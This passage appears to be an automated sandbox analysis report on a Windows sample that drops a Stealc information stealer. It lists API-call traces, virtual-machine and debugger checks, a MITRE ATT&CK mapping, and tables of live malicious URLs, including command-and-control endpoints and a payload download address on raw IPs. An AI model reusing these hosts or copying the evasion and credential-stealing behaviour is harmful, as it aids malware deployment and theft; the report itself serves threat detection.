Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02485127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_02485127
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_0248E597

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_024933F7 GetSystemInfo,wsprintfA,

1_2_024933F7

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.000000000091A000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 1D71.tmp.exe, 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWD
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_00404980 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

1_2_00404980

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_00404980 VirtualProtect 00000000,00000004,00000100,?

1_2_00404980

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008DDEA3 push dword ptr fs:[00000030h]	0_2_008DDEA3
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024A00C6 mov eax, dword ptr fs:[00000030h]	0_2_024A00C6
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]	0_2_0247092B
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]	0_2_02470D90
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_004263C0 mov eax, dword ptr fs:[00000030h]	1_2_004263C0
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009EDEA3 push dword ptr fs:[00000030h]	1_2_009EDEA3
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02496627 mov eax, dword ptr fs:[00000030h]	1_2_02496627
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0247092B mov eax, dword ptr fs:[00000030h]	1_2_0247092B
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02470D90 mov eax, dword ptr fs:[00000030h]	1_2_02470D90

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0249A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0249A63A
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0248073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0248073A
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0247FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0247FB78
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024808CD SetUnhandledExceptionFilter,	0_2_024808CD
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02499A10 SetUnhandledExceptionFilter,	1_2_02499A10
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02497E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_02497E31
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0249784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0249784F

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 1D71.tmp.exe PID: 7860, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	1_2_004246C0
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02494897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,	1_2_02494897
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02494927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	1_2_02494927

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Process created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024AB271
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_024A5034
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,	0_2_024A5427
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_024AB4E9
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_024AB534
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: EnumSystemLocalesW,	0_2_024AB5CF
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,	0_2_024ABADC
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024ABBA9
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,	0_2_024AB8AC
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024AB9D5
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_02492F67

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004229E0

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_02492E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_02492E17

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 1.3.1D71.tmp.exe.24b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.1D71.tmp.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1D71.tmp.exe PID: 7860, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 1.3.1D71.tmp.exe.24b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.1D71.tmp.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.1D71.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1D71.tmp.exe PID: 7860, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02491B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02491B33
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02490E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02490E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	3 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
SEejSLAS9f.exe	42%	ReversingLabs
SEejSLAS9f.exe	39%	Virustotal	Browse
SEejSLAS9f.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	47%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	47%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	0%	Avira URL Cloud	safe
http://92.255.57.89/s	100%	Avira URL Cloud	malware
http://92.255.57.89lq	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpo	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeo	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exev	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.php;	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeX	0%	Avira URL Cloud	safe
http://92.255.57.890	0%	Avira URL Cloud	safe
http://92.255.57.89l(	0%	Avira URL Cloud	safe
http://92.255.57.89/697b92cb4e247842/sqlite3.dll~	100%	Avira URL Cloud	malware
http://92.255.57.89/45c616e921a794b8.php2dPf	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEI	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	172.67.179.207	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://92.255.57.89/45c616e921a794b8.php	false	high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	high
http://92.255.57.89/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://92.255.57.89	1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.89/45c616e921a794b8.phpo	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=	SEejSLAS9f.exe	false		high
http://176.113.115.19/ScreenUpdateSync.exeo	SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89lq	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/s	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exev	SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/45c616e921a794b8.php;	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;	1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exeX	SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/	SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.890	1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89l(	1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false		high
